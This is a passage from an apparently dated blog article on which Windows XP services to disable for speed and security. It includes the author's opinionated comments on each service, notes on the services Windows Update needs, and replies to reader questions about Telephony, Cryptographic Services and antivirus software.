Comment: Do you really want a built in tool to share control of your desktop over your network connection? There are better tools for doing this kind of work, if needed. If someone you buy software from insists you let them use this tool to help you install it one time, then enable it and disable it immediately afterward. For typical use, you should disable it.
Remote Desktop Help Session Manager
Manages and controls Remote Assistance. If this service is stopped, Remote Assistance will be unavailable. Before stopping this service, see the Dependencies tab of the Properties dialog box.

Comment: Refer to NetMeeting. If you don't want to share control of your computer through your network, disable it.
Remote Procedure Call (RPC) Locator
Manages the RPC name service database.

Comment: There are some network programs and protocols that require this to be turned on. Chances are you could just turn it off and see if you break anything. If you are using a single PC in your home or SOHO, it's likely just a security risk. If you don't know you need it, disable it.
Remote Registry
Enables remote users to modify registry settings on this computer. If this service is stopped, the registry can be modified only by users on this computer. If this service is disabled, any services that explicitly depend on it will fail to start.

Comment: Seems self-explanatory. You can enable this service to help remote people or programs change your registry. Great hacker tool if you can't secure it. Disable it.
System Restore Service
Performs system restore functions. To stop service, turn off System Restore from the System Restore tab in My Computer->Properties

Comment: This is almost useless if you ever have a problem with damaged drives, corrupted data, or malware. It uses a lot of resources and isn't useful for most people. You can turn it on before you install a big piece of software. This service allows you to backup to a previous system should you mess your's up with an installation of software or a modification to your system settings, usually registry damage. To improve system performance and take the minor risk of not being able to make your computer work like it did yesterday, disable it.
TCP/IP NetBIOS Helper
Enables support for NetBIOS over TCP/IP (NetBT) service and NetBIOS name resolution.

Comment: Very few people use NetBIOS at home. This is the Windows built-in protocol for simple networking. You may need it. Otherwise, disable it.
Telephony
Provides Telephony API (TAPI) support for programs that control telephony devices and IP based voice connections on the local computer and, through the LAN, on servers that are also running the service.

Comment: If you use telephony, you probably use discrete devices or proprietary services that don't rely on this service. However, you do need this servive if you use a modem to connect to the ineternet. It's required by all sorts of hardware you wouldn't think require it, including accessing the internet via 3G telephones as tethered modems. Set this service to automatic to be safe.
Telnet
Enables a remote user to log on to this computer and run programs, and supports various TCP/IP Telnet clients, including UNIX-based and Windows-based computers. If this service is stopped, remote user access to programs might be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start.

Comment: There's just not a circumstance where I can imagine that turning this service on is a good idea. Unless you need to let people telnet into your computer and have a really good reason for doing so, disable it.
Terminal Services
Allows multiple users to be connected interactively to a machine as well as the display of desktops and applications to remote computers. The underpinning of Remote Desktop (including RD for Administrators), Fast User Switching, Remote Assistance, and Terminal Server.

Comment: As I've said above, there's better tools for remote desktop administration. The idea of Terminal Services is to allow remote desktop administration of a system, like the user was on the actual console. In almost all circumstances you should disable it.
Themes
Provides user experience theme management.

Comment: Themes are cute and bloated. Enabling themes is not a good way to increase performance, but you may think it's neat. If you aren't addicted to cute desktop eye candy, disable it.
Uninterruptible Power Supply
Manages an uninterruptible power supply (UPS) connected to the computer.

Comment: Unless you are using a UPS on your computer and it has the capability of managing the system, disable it.
Upload Manager
Manages synchronous and asynchronous file transfers between clients and servers on the network. If this service is stopped, synchronous and asynchronous file transfers between clients and servers on the network will not occur. If this service is disabled, any services that explicitly depend on it will fail to start.

Comment: If you are not in a local network sharing data (files and/or services), disable it.
Windows Time
Maintains date and time synchronization on all clients and servers in the network. If this service is stopped, date and time synchronization will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start.

Comment: Sometimes it works. Unless you are really needing your time to sync to something running a Windows time server, disable it.
Wireless Zero Configuration
Provides automatic configuration for the 802.11 adapters

Comment: Unless you use 802.11 devices, disable it.
Workstation
Creates and maintains client network connections to remote servers. If this service is stopped, these connections will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start.

Comment: If you are not in a local network sharing data (files and/or services), disable it.

If you turn off all the services suggested above and try to use Automatic Updates via WindowsUpdate.Microsoft.com, you will likely see a message something like this:

Windows Update cannot continue because a required service application is disabled. Windows Update requires the following services:

"Automatic Updates enables detection, downloading, and installation of critical updates for your computer.

Background Intelligent Transfer Service (BITS) enables faster, restartable downloading of updates.

Event Log logs Windows Update events for troubleshooting. To ensure that these services are enabled:"

It's easy to just go back to Services, and turn these services on as you need them. An operating system shouldn't need daily updates to run. And, the more services you run, the more likely you are to need updates. See a circle here? Occasionally, a little laziness won't kill you. Though you could just go to Technet (Microsoft's only support for IT professionals) and get all your news and update files with descriptions of their efficacy and safety, you may occasionally just want to veg out and let Microsoft do the work for you. You should still read each update and decide for yourself whether it makes sense. Some of them are flat out bad news. But, turning up these services for a few minutes to run Automatic Updates may be a shortcut to periodic updates.

So, let's look at the services they want you to turn on.

Automatic Updates
Background Intelligent Transfer Service
Event Log

I haven't a clue why you need Background Intelligent Transfer Services to run so you can go to a website, download, and install service packs. But, you can turn it, and the others, on and then turn it back off when you are done. It's just three services.

If you turn off all the services suggested above and try to use Automatic Updates via WindowsUpdate.Microsoft.com, you will likely see a message something like this:

Windows Update cannot continue because a required service application is disabled. Windows Update requires the following services:
Automatic Updates enables detection, downloading, and installation of critical updates for your computer.
Background Intelligent Transfer Service (BITS) enables faster, restartable downloading of updates.
Event Log logs Windows Update events for troubleshooting. To ensure that these services are enabled:

So, let's look at the services they want you to turn on.

Automatic Updates
Background Intelligent Transfer Service
Event Log

If you take a minimalist's point of view to running both software and services on your computer, it will perform faster and more safely than it will if you just randomly load anything anyone tells you to. To better secure your PC, stick to a mindset that if you don't absolutely need a service running right now, you should just turn it off.

For those of you that break stuff when you turn off services I suggest are unnecessary.

If you turn off all the stuff that blatantly doesn't have anything to do with the network, you should be fine. Then, turn off one thing at a time that you /think/ doesn't support your network connection. If you lose your connection, turn the service back on. Next, and this part is very important, make sure your network settings are accurate and set for "on" so you can reconnect. You should find out how your PC connects to your local network before you get started and document it. But, anything you turn off that breaks something needs to be carefully examined and documented (write it down somewhere).

Just because you turn a service back on, doesn't mean your broken software will magically start working again. For example, remember the issue of using a computer in your network to manage your connection? If that's how you connect, you'll have to reconfigure that connection to get online if you kill it by killing a service. Likely, Computer Browser will cause this kind of problem. Also, just enabling the service doesn't turn it on. You need to manually restart it, since the start, enable, stop, settings go into action on bootup. So, if you don't want to wait til your box reboots, you'll need to manually turn off the service if you want it disabled, and manually turn it on if you want to enable it (and see if that given service is your problem).

What about System Restore? Well, I don't like it. If I had a dollar for every time someone fouled up their PC, ran system restore, and were amazed that all wasn't suddenly happy sunshine, I'd have a really nice vacation home. I realize it makes life easier for newbies that randomly screw stuff up and can't be hassled with learning the things they use. But, for most cases, it's a great tool for virus and worms to avoid capture. You delete them, they have a backup switch to recapture control through the restore program. Many antivirus programs don't work properly when you have this feature enabled. You can leave it on if you're a fan. Perhaps it makes you feel good, like it would make everything right again if you had it around. But, it won't save you from a serious problem. Backups and safe computer practices will.

You need to learn enough about your PC to run a functional backup and restoration of your critical data. If you can't do this, you're just waiting to lose everything.

Don't be afraid to learn more about your PC. It's one thing to run through a checklist of stuff I suggest you don't need. But, it's not a guarantee that I address every concern for every user. With a few hours here and there of learning now, you'll save yourself a lot of frustration later. The things I learned about Windows five and six years ago still serve me today. The things I learned about networks running Unix systems serve me every day, no matter what operating system I may run.

Enjoy learning; it's the first line of defense against bad software and broken PCs.

[Check out Run a Faster Windows PC, now that you're done with this article.]

Latest comments:

Hi, three things, and I know I'm a few years late with the first, and maybe you've gotten it a few hundred times already, but I've only recently discovered your article on unnecessary services that windows... [snip]

You know, that article is really, really old. And, to be honest I don't update it and can't imagine why so many people read it. It makes me think I may should spend more time on things like that - keeping it current, etc. So, I will add comments down here as folk email me questions and comments.

You mention that Cryptographic Services is unnecessary unless you work in a large network atmosphere (or something along those lines), plus stuff about certificates.

[snip] ... is required for automatic updates.

I think this is recent behavior. Just yesterday I downloaded TweakUI for a friend and his WinXP complained the software wasn't signed... WHAT!? Microsoft didn't bother using their beloved signing technology even though they act as though anything that's not digitally signed is a trojan or virus? Amazing, but they don't retroactively utilize their own technologies and they often throw new requirements (often for "security" sake) on their old operating systems.

I actually changed my position on this and though it's dangerous on multiple levels, I think considering all it's almost required that you leave auto-updates running, since you can't possibly run a safe PC without daily update checks and who can be bothered to run updates manually every day. Microsoft doesn't exactly make downloading and installing them manually a simple process.

BTW, if you download the updates manually from TechNET, you don't need this service running - but that's not what you want to do, you just want to click a button and have your system automatically update. Automatic and automatic have different meanings here. I mean, the update you're trying to do with the click is automatic, and the update that happens without your involvement at all (scheduled automatic updates) is also automatic.

Telephony Services: you say it's unnecessary if you don't use a modem to connect to the internet, and I was like "Nah, I have cable because I'm t3h 133720r2!" and I tried to turn it off, and it won't turn off. And before I pressed the issue, a question came to mind- is a cable modem still a modem in the sense that you're referring to them? And if so... who the XXX is lucky enough to not need any modem at all to connect to Al Gore's miracle?! So that threw me off a bit.

Well... there's two answers to this question - the implied and the direct.

I used to have a "cable modem," but I used a network connection (via my NIC) to connect. I have DSL now and do the same. Most modern distributions of network connections (DSL/Cable/T1/etc.) use plain ole NICs to connect - some people install that awful driver software, and that //may// require this feature, though honestly I've not personally tested so I don't know for fact.

Let me tell you this - all kinds of crap uses telephony. VOIP, modems, fax, etc. all use it. Even my stupid fax printing software that sends the fax through //EMAIL// uses the telephony service.

Lastly, this one comes from the article you link to at the bottom of the unnecessary services article, about running a faster Windows PC. You suggest Avira Antivir to replace McAfee and Norton, and seeing as how you had thus far proven to be a pretty legitimate tech advisor (I started getting paranoid that in the stead of traditional viruses, people just give you "advice" to delete perfectly vital bits of software and whatnot), I jumped on the free version. I had been a McAfee noob, and had been increasingly frustrated with it.

Avira works great and all, but there's one little thing that drives me crazy that I can't seem to figure out. How the XXX do you get rid of the "Notifier of Avira" that constantly bugs you to buy the premium edition and reminds me of spyware/popups itself?

[snip] ...plenty, so I really can't justify working over 20 whole hard-earned dollars just to make what amounts to be a popup, from a program that is supposed to... [snip]

I'm afraid they've jumped onto the harassment bandwagon with their free product. It's annoying. And, to be honest I just plopped down the $40 and bought the commercial license of Avast recently. I suggest you do the same.

All antivirus companies eventually get dragged into the corporate profit game and leave the good antivirus arena. The fact is, it's not really considered a good growth model to stick to plain ole antivirus software. The big guys lead the track on bloatware, but everyone gets into it. They either offer more bells and whistles and harass you or harass you to spend more money on the basics. Once they feel that they've saturated the "I just want a good antivirus program" market, they start banging on your wallet.

But, for the moment, I'm happy with my commercial Avast.

As for forking over $20 to stop the harassment. I'm sorry, but as a capitalist I don't really mind this so much. And, to be honest $20 for protection without the CPU tax other big brands charge - gimping your entire machine for the promise of safer web browsing - it's a good deal. I'd pay the $20. It's worth it.